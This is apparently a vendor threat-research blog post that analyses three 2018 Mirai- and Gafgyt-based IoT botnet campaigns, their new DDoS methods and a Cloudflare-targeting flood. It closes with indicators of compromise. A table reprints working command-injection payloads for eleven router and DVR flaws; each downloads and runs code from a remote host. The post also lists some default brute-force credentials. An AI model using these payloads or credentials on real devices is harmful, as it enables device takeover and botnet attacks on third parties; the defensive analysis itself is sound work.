The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection vulnerability, only a few weeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public knowledge since February of 2016).
While exploring samples belonging to one of these campaigns, I also discovered they support several new DDoS methods previously unused by Mirai variants.
This blog post details each campaign (in the chronological order they were observed) along with the exploits used, the new DDoS methods supported, ending in a comparative summary of the campaigns. Also covered is the tangential discovery of some Gafgyt samples incorporating new Layer 7 DDoS functionality targeting a known DDoS-protection provider.
IOCs for different campaigns, if not mentioned under the corresponding section, can be found at the end of this blog post.
CAMPAIGN 1: An evolution of Omni
In May 2018, the Omni botnet, a variant of Mirai, was found exploiting two vulnerabilities affecting Dasan GPON routers - CVE-2018-10561 (authentication bypass) and CVE-2018-1562 (command injection). The two vulnerabilities used in conjunction allow the execution of commands sent by an unauthenticated remote attacker to a vulnerable device.
Since then the same family has evolved to incorporate several more exploits, detailed in Table 1.
I used the sample below for this analysis
SHA256 | 3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d |
CVE-2018-10561, CVE-2018-10562 | Dasan GPON routers | XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host= ;wget+http://%s/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host= |
CVE-2014-8361 | Different devices using the Realtek SDK with the miniigd daemon | POST /picsdesc.xml <?xml version="1.0" ?><s:Envelope xmlns:s="" s:encodingStyle=""><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient> cd /tmp/; rm -rf*; wget http://%s/realtek </NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>POST /picsdesc.xml<?xml version="1.0" ?><s:Envelope xmlns:s="" s:encodingStyle=""><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient> cd /tmp/;chmod +x realtek;./realtek realtek </NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> |
Netgear setup.cgi unauthenticated RCE | DGN1000 Netgear routers | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s/netgear+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
CVE-2017-17215 | Huawei HG532 | POST /ctrlt/DeviceUpgrade_1 <?xml version="1.0" ?><s:Envelope xmlns:s="" s:encodingStyle=""><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/huawei -r /huawei; sh /tmp/huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Eir WAN Side Remote Command Injection | Eir D1000 routers | POST /UD/act?1 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="" SOAP-ENV:encodingStyle=""><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1> cd /tmp && rm -rf * && /bin/busybox wget http://%s/tr064 && sh /tmp/tr064 </NewNTPServer1><NewNTPServer2>echo OMNI </NewNTPServer2><NewNTPServer3>echo OMNI </NewNTPServer3><NewNTPServer4>echo OMNI </NewNTPServer4><NewNTPServer5>echo OMNI </NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /UD/act?1 |
HNAP SoapAction-Header Command Execution | D-Link devices | POST /HNAP1/ SOAPAction: cd /tmp && rm -rf * && wget http://%s/hnap && sh /tmp/hnap
(Faulty exploit: In this implementation, the exploit code is appended to “”, and hence the above condition will not be triggered. To the best of my knowledge this exploit will not work on any devices) |
CCTV/DVR Remote Code Execution | CCTVs, DVRs from over 70 vendors | GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s/crossweb;sh${IFS}/tmp/crossweb&>r&&tar${IFS}/string.js |
JAWS Webserver unauthenticated shell command execution | MVPower DVRs, among others | GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/jaws;sh+/tmp/jaws |
UPnP SOAP TelnetD Command Execution | D-Link devices | POST /soap.cgi?service=WANIPConn1 <?xml version="1.0" ?><s:Envelope xmlns:s="" s:encodingStyle=""><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient> cd /tmp;rm -rf *;wget http://%s/dlink;sh /tmp/dlink </NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> |
Netgear cgi-bin Command Injection | Netgear R7000/R6400 devices | GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/netgear2;${IFS}sh${IFS}/var/tmp/netgear2 |
Vacron NVR RCE | Vacron NVR devices | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/vacron;sh+/tmp/vacron |
All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.
Differentiating features of the campaign:
- Two different encryption schemes: Aside from using the standard XOR encryption scheme seen in all Mirai variants, in this case using the table key 0xBAADF00D samples make use of a second key for the encryption of certain config strings.
- Samples rely solely on exploits for propagation and don’t perform a credential brute-force attack.
- Further infection of infected devices is prevented by dropping packets received on certain ports using iptables (Figure 1)
Figure 1: Screenshot from malware disassembly showing the use of iptables to drop future connection attempts via certain ports
The campaign makes use of the IP 213[.]183.53.120 both for serving payloads, and as a Command and Control (C2) server.
Pivoting off this IP, I discovered some Gafgyt samples that surfaced around the same time reporting to the same IP, but using a new method named 'SendHTTPCloudflare'. This method is detailed at the end of this blog post.
This campaign was linked to the Omni variant on several references in the code as seen such as the one seen in Figure 2 below.
Figure 2: OMNI reference in samples
The encrypted strings also reference a website gpon[.]party that was down at the time of this writing.
Figure 3: gpon[.]party reference
Samples from this campaign were served from the IP 46[.]243.189.101. This host briefly had an open directory containing the samples, as seen in the figure below.
Figure 4: Screenshot from open directory at payload server 46[.]243.189.101
The payload source in this attack was located at hxxp://46[.]243.189.101/gang/. The downloaded payload is a shell script that attempts to replicate itself by downloading Okane binaries to vulnerable devices. On the 13th of June, the payload source for some of these samples was briefly replaced with the Cloudflare DNS server 1[.]1.1.1.
This campaign incorporates the same exploits listed in Table 1. Figure 5 shows these exploits being called sequentially in one of the samples belonging to this campaign. Each call results in the creation of a dedicated fork for each exploit.
Figure 5: Screenshot from malware disassembly of exploit calls in a sample from Campaign 2
Unlike the previous campaign, these samples also perform a credential brute force attack. Some unusual entries were discovered on the brute force lists in these samples, such as the following:
- root/t0talc0ntr0l4! - default credentials for Control4 devices
- admin/adc123 - default credentials for ADC FlexWave Prism devices
- mg3500/merlin - default credentials for Camtron IP cameras
Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.
Below are descriptions of these new DDoS methods, extracted from the following sample.
SHA256 | 320ed65d955bdde8fb17a35024f7bd978d26c041de1ddcf8a592974f77d82401 |
- attack_method_tcpxmas: involves sending TCP packets with all flags set, also known as Christmas tree packet This could be considered a more effective means of DDoS since these packets “require much more processing by routers and end-hosts than the "usual" packets do.” This method has already been observed used by Gafgyt and Kaiten variants in the past. The payload size of packets sent is set to 768 bytes.
- attack_method_std: involves sending packets with a randomized payload of 1024 bytes.
Digging deeper reveals that samples using these attack methods have been part of a Mirai code fork from as early as August 2017.
Some newer samples from the same campaign also integrate additional methods that only appear in samples from the beginning of June 2018. Some notable methods are detailed below.
For this analysis I used a sample with the following hash.
SHA256 | be1d722af56ba8a660218a8311c0482c5b2d096ba91485e7d9dfc12a2b8e00b3 |
- attack_method_udpgame: UDP DDoS using SOCK_RAW from a random source port to the destination port 27015 (often used by online game servers).
- attack_method_asyn: TCP DDoS using packets with random source and destination ports, using packets with the ACK and SYN flags set.
- attack_method_tcpfrag: TCP DDoS using SOCK_RAW with random source and destination ports and sequence number, and flags URG, ACK, PSH, RST, SYN and FIN set. In this case the ‘Don’t Fragment’ bit is set to 1.
- attack_method_tcpall: same as attack_method_tcpfrag above, except the ‘Don’t Fragment’ bit is set to 0.
- attack_method_tcpusyn: TCP DDoS using packets with random source and destination ports, using packets with the URG and SYN flags set.
On the 19th of June, samples on this server were stripped of their exploits and reverted to using a simple brute force and subsequently dropping a shell script, for self-propagation.
Figure 6: Shell script used by newer Okane samples for self-propagation
Earlier samples belonging to this campaign use all the exploits detailed in Table 1, except for the UPnP SOAP TelnetD Command Execution exploit. The payload source for this campaign was hxxp://hakaiboatnet[.]pw/m and the C2 server was 178[.]128.185.250. Samples make use of an encryption scheme similar to Mirai; unlike previous campaigns, they are built on the Gafgyt source code, which is also known as Bashlite, Lizkebab, Torlus or LizardStresser.
Samples listen for the following commands:
Command | Translation |
SC ON | Scanner On |
SC OFF | Scanner Off |
H | HTTP Flood |
U | UDP Flood |
S | STD Flood |
T | TCP Flood |
KT | Kill scanner threads |
Newer samples from the same server were found to have also incorporated an OS Command Injection exploit against D-Link DSL-2750B devices. These samples use the same attack methods, encryption key and C2 as the samples above, however they source their payload from hxxp://178[.]128.185.250/e.
Figure 7: Exploit targeting D-Link DSL-2750B devices used in newer samples of the campaign
Table 2 shows a comparative summary of the three campaigns
Campaign | Exploits Used | Built on | Payload source | C2 | Config string encryption/decryption key | Also brute forces credentials? |
1: Evolution of OMNI | All exploits in Table 1 | Mirai | hxxp://213[.]183.53.120 | 213[.]183.53.120 | Two different keys used – 0xBAADF00D, 0xDEADBEEF (or the equivalent of a byte-wise XOR with 0x22) | No |
2: Okane | All exploits in Table 1 | Mirai | hxxp://46[.]243.189.101/gang/ | 142[.]129.169.83:5888 | 0xDEACFBEF | Yes |
3: Hakai | All exploits in Table 1, except UPnP SOAP TelnetD Command Execution. Newer samples also incorporate a D-Link DSL-2750B OS Command Injection exploit | Gafgyt | hxxp://hakaiboatnet[.]pw/m, hxxp:// 178[.]128.185.250/e |
178[.]128.185.250 | 0xDEDEFFBA | Yes |
Table 2: Comparative summary of the attack campaigns
Gafgyt with a new Layer-7 attack
Layer-7 DDoS attacks targeting specific DDoS protection service vendors are not new and were already observed in the form of the DvrHelper variant of Mirai.
They have however not been observed used by Gafgyt samples until now. While pivoting on the C2 used by samples of Campaign 1, I came across some Gafgyt samples listening for an additional command called HTTPCF.
When this command is received, the bot calls a function called SendHTTPCloudflare that does as its name suggests, targeting a URL path used mostly by sites protected by Cloudflare. The earliest samples observed using this attack were from the end of May 2018.
Figure 8: URL format targeted by HTTPCF
Samples use the same IP i.e. 213[.]183.53.120 at port 8013 for C2 communication.
They also make use of some unusual User-Agents (UA) as seen in Figure 9. All UAs found in these samples are listed in the appendix
Figure 9: Some unusual User Agents found in related Gafgyt samples
The initial rise of botnets targeting embedded systems had brought to light the security risks from millions of Internet-connected devices configured with default credentials.
The evolution of these botnets to the use of multiple exploits, be it IoT Reaper or the campaigns discussed here, shows how attackers can build enormous botnets consisting of different types of devices, all responding to the same C2 server. This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices. However, the onus is on device manufacturers to ensure their devices are easy to update, and that they deploy the updates in a timely manner.
Palo Alto Networks customers benefit from the following protections against these attacks:
AutoFocus customers can track these activities using individual exploit tags:
- CVE-2017-17215
- CVE-2014-8361
- DLinkOSInjection
- NetgearRCE
- VacronNVRRCE
- EirRCE
- GPONExploits
- DLinkDSL2750BOSCmdInjection
AutoFocus customers can also use the following malware family tags :
WildFire detects all related samples with malicious verdicts.
All exploits and IPs/URLs involved in these campaigns are blocked through Threat Prevention and PANDB.
Indicators of Compromise
Campaign 1 samples |
000b018848e7fd947e87f1d3b8432faccb3418e0029bde7db8abf82c552bbc63 |
37e3a07a17a82175c60992f18eaf169e4014915eb90fac5b4704060572cfa60b |
3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d |
3b3a66c2c27f5821d5304e22a2a34b044027ffaac327df5263674b4aa25bc901 |
4c07af1041e0d83437d4b14226204652574b428cd1dbd4bfc7047c13dffc4700 |
Campaign 1 related URLs/IPs |
213[.]183.53.120 |
Okane Multi-exploit samples |
00499879c74122881e436fbf701a823d4dc53ff6946e58dd0e5410bad24f3d57 |
0fa81ebe444cfe7413f90ca116817cdfa3ccfdc41160fcd64032630d30b2d598 |
11628ac93368228e949d9b7e380a065e58c02626a8fd7896db8c2dec51583d1d |
1d6c5a560bbb57695c502b5d642e48fbe6bddc45defdb56fa25bd94ae17e5a14 |
216492260b8d1342988c1688962dd95a48af8c801afe03c6801ec07d74862e60 |
264a194bda6aaa51665d5c872237613ac153e67827e7b0bbbe84b4e8e464544c |
38736acdf58a418acd778a3203df9e84b4470a71031fe9e6d52170ad3c15e794 |
39893d4a033fd29faea37d09b4c8cfb9be04ffc19288506551e18d294e96bb2d |
49f98a91c95a633a6d7a9a134e3a8e881e12aeede758a4367432ad3cab1c2b28 |
50473fc0d89fd5ed0a20c96f34c419c5ee66e630fecb88a095283450229a934e |
509a7cc2335ef667ddc20298a3fae9c9c966be400719343cb59b042d05a98426 |
5352dc35d97ceb2d9bf58113ee1196daea66cd4a4bce9acba29ee05f4d84170e |
55771db22c6305f7fba0b20b19b8537e85a45b80ddbcba1ffe0f6d30ef8697d6 |
645128d788b5cc1becc2546973e658c03e2ee33116013b84c05904a18044e353 |
834e675813e517aa0b4b6c65edbb2e8bf141b272f6918b443c69793db365ff3b |
893309bc397058d50bba7c5c077bfc7f64956a098e452c63813c074beb8837dc |
8b65ac91af993f95b57535e5a71571bbc06fbb37e1bfd47313585dceda345fd9 |
916cf77c6af335732007fd0c09ec49b8f29053731a062c33a66d65793495dcd5 |
93fa2bb5a64216d8579a53debcb9b2dade3a0a995c3026b04667fd472e7841a3 |
9e150ccd410ed8a3a8673e092450bd6dc0f5abc2d7306e2d05b57cfb21d8d4df |
9fe586ead4a1b003c023c75467c9b1fcda3414265ea50e060e939a4078c79234 |
a0d7592cfcd469e10a9ca463780737c76d3e61c5b750345998b18721b3565f0d |
a36adfa5ecec9ad5429c817de3fbece20d1b526c116d2bfccd9366aabacc2c32 |
ac7bb0c8bf67186572ee931f86f679e12f6737d8e36936fb40a870dc3aeeee22 |
b2156ce005eacccabe0ed668bbced761df1da1f1da32e645d344eaa8f075dbb9 |
b55bea0bf708734491d101f41ecdbb592e69b8ccc053b7dfc33fe3e465c80b9f |
b72c22efed4b68d52fbc97360c388fc1812d431c208cf35af5bdcc850e8a2e01 |
bc11fcafe415b1bf74abbeb5189cb72f991bb6dfb01b61f2d96cbb4cfd6d9e2f |
bd89be28ddecca983cc91835febce818a1f09bda471399b031f99c5278169344 |
bf94315a9591d77ee2d08823afaeaf7e45133d4af2d3c3ce4086aff371f248d2 |
c02a7a06f77bad974acd6bc193e1cb7dc73a009317f1044d202593dc3b0a67cf |
c42bdc0d7bbdf9a74db9233010f2b04ca14e0864119a1c98d6c8a7a63574791c |
c659709cbea976692e4be58f1f04d99127b55325f404c63525fb9ab575a66b2d |
c750d1ad0d5f5d7dda2ab8dba33fa49ef1c636905abab364a70db44ab8035ab6 |
cfd33c0bcb7001c56a8e9438c1a5d6b34c6bdd7a2404c2fe0cdfea00abdf355a |
d15d46b4d9d826bcf8cb0b43fa1f7e874708db9bb068c3aff27daa7193b51fd7 |
d2655773f812887da069965ad8113501aeb0a0e26aa27faa9a1469fd510ceb3c |
dacdf9b548f123482f5ecc2a29d2d156021bdab250a933ace9aee140041b9abb |
dbdffabc13a70a41188900620569266b5774deb007e0ef6dc63ff16ce72b4595 |
dcfae13f567ea01c872db539c5d89448ebde2debe46421eccf752d4e20298c58 |
e0ddec27709ec513886a217009f55994ddf61f58887774d6403ec18d5612d9e6 |
e8782c38fc7c148be589a3c44f915719378840ddbf709fd48932797609f8daf2 |
ec1fdb298556406d75506a234562f60ae517569963a317741dd4bd90680fb4ad |
edf32e6317253a323c4e815485ff4b97c4e0af268be8d78c9c0e48ac87e52e55 |
f390995777d4cad93854e4030b8bc33d2405c7ddd548da5e00a589b9e7afd722 |
Okane related IPs/URLs |
46[.]243.189.101 |
142[.]129.169.83:5888 |
Okane Multi-exploit samples fetching payload from |
25763b7871c0be5dc9a3ffa4abb4fce308297baf14c0389a70336b429b0c7c39 |
7bde2df856061806a1a7294b780bfbcf1439ec0f9dbb4d6495c7c0d5873505d5 |
fca262afd92ec24af4370c664b68f453c3f97f3555ab37178ec80bbaebf7dfa6 |
Okane Multi-exploit samples using attack_method_tcpxmas and attack_method_std |
0e7d4fa178b78cbfd0eaea910a53c7b933590764b72a93cd54f5823076869ab5 |
320ed65d955bdde8fb17a35024f7bd978d26c041de1ddcf8a592974f77d82401 |
5eef17f59d2c3d88d08da8d07dcca13e4225d800fce7a7fed5504e789008dc17 |
692b3b9ea76447447b11655711cdd22040972b1903749fe49b478ec92cdd4f7a |
a0d7592cfcd469e10a9ca463780737c76d3e61c5b750345998b18721b3565f0d |
a36adfa5ecec9ad5429c817de3fbece20d1b526c116d2bfccd9366aabacc2c32 |
c42bdc0d7bbdf9a74db9233010f2b04ca14e0864119a1c98d6c8a7a63574791c |
d15d46b4d9d826bcf8cb0b43fa1f7e874708db9bb068c3aff27daa7193b51fd7 |
Okane sample without exploits using several additional DDoS methods |
0ea858e747863f2c94eda3f28167951ad8cafca2cb0be1c247d01a53fb7e56e0 |
be1d722af56ba8a660218a8311c0482c5b2d096ba91485e7d9dfc12a2b8e00b3 |
Hakai samples |
0f5b814308193064bc4ece4266def5c1baecc491117f07650c5117762648d4c5 |
46625884d4cc5ec9ca32221e90f3c187ef7d713fbabe8e33cad843587c0911e0 |
721da99e8789cdcb73db87353e2be7b82c9158e2929b9eaa7d5b4660b6d4d1e2 |
76a2853701ab4a8d989f383857d0d4cb8d6a7df38d543d4cb06a02079acb74c2 |
7e8280387887f27461f2ed758a401daf49e27342c684f199751391bfb83f438d |
c959e580c4709c8aa304ffe5b3ab4ccfbdb3327b695cf5f8b4d27591664579f7 |
d248c1ce41d474de0ea05b34d721271c53a861e06d355e4e6e83a8955c7bbc0a |
d669388681bb8d17aa2d5ee1f943ae5e8ad8729d88c78ec86b10fe51a4701c43 |
f05e731a3dca8868af3a05ae4867a39f397e0d54221229c0be74c8a20d00e364 |
Hakai URLs/IPs |
hakaiboatnet[.]pw |
178[.]128.185.250 |
Gafgyt HTTPCF samples |
1eec1ef48d93106f3f00b4d4868b32a3ca8ca8da9a0852ef81a9e9226206362b |
385ba7fcf276fb0b469defac7762908921df820c550e98abadec725f455b76fe |
5c797cd7faf5061a75c68cc8f658c7daab94c223f523bfca0a28ba2620b1cd9f |
8339dc35688574b33b523234ba76fee56d57b369c9c0292644ec2a0cf798244d |
a5fe23186c95bfa9e5df8b3fb28a1922a1e820b8f51401d9042542e18f9aaec1 |
c12132f341d19c386a617ff2a607df35648ab6f17106608a575d086fadfe3a04 |
c159087ee8af27685a6b46b18cb59dfbcff85a165cd308c5d617eb3f8166b328 |
e949a6429530b8b6876073dc025a0cda0d6311a6dc15fcb72b24a3fe6cb86529 |
fe0c3682dac042b8cb92e731ace80660d7722782c1c5551ec2a18e747788c73d |
User-Agents used by Gafgyt HTTPCF samples |
MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 |
Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000 |
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0 |
MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0 |
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) |
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0) |
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